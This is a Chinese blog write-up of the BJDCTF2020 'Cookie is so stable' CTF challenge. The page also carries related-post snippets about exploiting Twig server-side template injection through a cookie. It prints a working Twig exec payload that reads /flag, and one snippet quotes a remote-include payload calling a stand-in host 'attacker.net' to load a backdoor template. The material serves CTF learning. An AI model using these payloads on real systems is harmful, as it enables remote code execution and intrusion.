[BJDCTF2020]Cookie is so stable 1(twig模板注入)

最新推荐文章于 2025-10-27 15:49:17 发布
原创 最新推荐文章于 2025-10-27 15:49:17 发布 · 467 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文深入探讨了在BJDCTF2020比赛中遇到的一个Cookie中的Twig模板注入漏洞。通过分析包内容,作者发现了两个不同之处,并确认存在SSTI注入。尽管在页面上直接操作无法获取Flag,但通过测试构造了Payload,揭示了过滤机制的重要性。

详解模板注入漏洞
关于SSTI注入的一些理解
抓个包:
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述
发现了两个包在cookie上的不同
判断是twig,经过测试发现是ssti注入
Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
请添加图片描述
注释:如果不抓包在页面是无法获得flag的,应该有过滤
在这里插入图片描述

最低0.47元/天 解锁文章
Twing模板注入 [BJDCTF2020]Cookie is so stable1
m0_75178803的博客
02-28 666
打开题目我们先抓包分析一下可以输入{{7*7}}处发包试一下可以看到在cookie处存在ssti模板注入输入{{7*‘7’}},返回49表示是 Twig 模块输入{{7*‘7’}},返回7777777表示是模块在这里可以看出是Twing模块我们直接用固定payload就可以得到flag。
[BJDCTF2020]Cookie is so stable 1
plant1234的博客
05-28 512
[BJDCTF2020]Cookie is so stable 1 首先打开题目发现是一个登陆框: 经过测试发现有ssti注入: 然后是检测ssti注入类型: 模板注入漏洞: 可以参考: 一篇文章带你理解漏洞之SSTI漏洞 在测试一下{{7*‘7’}} 发现是: 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 所以判断是Twig 根据提示是cookie,于是登陆后抓个包得到: 在cookie的user处有注入 应为确定
[BJDCTF2020]Cookie is so stable 学习笔记
最新发布
qq_60114866的博客
10-27 135
本文介绍了一个CTF解题过程:通过查看网页源代码发现提示后尝试抓包检查cookies,但未发现异常。在尝试SQL注入等方法无效后,参考他人解法发现需要使用SSTI(服务器端模板注入)漏洞。最终在抓包时发现user信息存储在cookie中,将模板注入代码写入cookie后成功获取flag。文章简要记录了从发现问题到最终解题的关键步骤,重点在于识别出SSTI注入点并利用cookie传递攻击载荷。
[BJDCTF2020]Cookie is so stable1
kw741951的博客
08-04 285
尝试{{7*7}},发现ssti漏洞,判断是twig。提示看cookie,burp抓包查看cookie。抓包,发现user为注入点。点击hint查看源码。
[BJDCTF2020]Cookie is so stable
qq_43801002的博客
07-31 1442
题目 过程 1.Flag和Hint两个页面抓包,flag页面告诉我们要先登录,hint页面告诉我们要在cookie里面做文章 2.flag页面先登录然后抓包,发现cookie里面出现user。尝试多次后,发现是ssti注入 3.打入payload。 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} ...
[BJDCTF2020]Cookie is so stable(ssti模板注入从0到1学习笔记)
姜小孩的博客
03-31 2032
ssti模板注入从0到1 [BJDCTF2020]Cookie is so stable buu
BUUCTF [BJDCTF2020]Cookie is so stable
weixin_73399382的博客
07-22 811
这道题先点了一下没发现什么get参数,dirsearch和githack都扫了一下没啥收获,后面在hint源码中发现一行注释让我们仔细看cookie又回去在flag页面随便输个名字(只有这里有操作的地方),看到发了两个数据包,post方式包里面带两个请求体参数,不过cookie没有什么异常get型数据包里面发现多了一个参数usercookie一般存在什么问题,伪造身份,注入?这里伪造身份肯定不存在,那就只能注入了,但是有个问题是我们输入的数据被当做数据打印出来了,那就没法sql注入
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)
小宇的web博客
02-18 3532
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解) 先看一下题目 有首页,有flag页面,有Hint页面 这里题目有提示,突破口是在cookie上面 这里先进行抓包分析 这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击 这里有判断模板注入类型的办法 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 这里在cookie处进行判断 user={{7*‘7’}},查看返回值
BUUCTF-web类-[BJDCTF2020]Cookie is so stable
weixin_44622228的博客
04-20 969
BUUCTF-web类-[BJDCTF2020]Cookie is so stable 题目提示Cookie,进入靶机就看看cookie, 目前看来没有什么异常,先看看页面,发现有flag按钮,查看一下 要我们输入一个id,随便输入个123看看, 回显我们的id,于是看了看我的cookie,发现Cookie中多了user参数。 初步猜想,有没有可能是Cookie注入?于是我输入了几个注入关键字测试...
[WP/SSTI/PHP_Twig]Cookie is so stable解题/Twig模板注入
車鈊的博客
07-23 799
[BJDCTF2020]Cookie is so stable PHP-Twig模板注入 参考了知乎大佬的文章:https://zhuanlan.zhihu.com/p/28823933 通过_self我们可以调用环境变量中的env属性,当PHP打开远程加载文件的参数(allow_url_include)时,问我们可以通过它来实现远程文件包含 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor
模板注入Twig
2401_88743143的博客
03-07 1442
为了使用户界面与业务数据(内容)分离而产生的,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,再放到渲染函数里,生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过
Twig模板引擎详解
1. **安全**:Twig提供了一种沙箱模式,可以在不受信任的环境中运行模板,防止潜在的代码注入攻击。它还对输出自动进行HTML转义,以防止XSS(跨站脚本)攻击。 2. **灵活的语法**:Twig的语法简洁明了,例如使用`{{...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值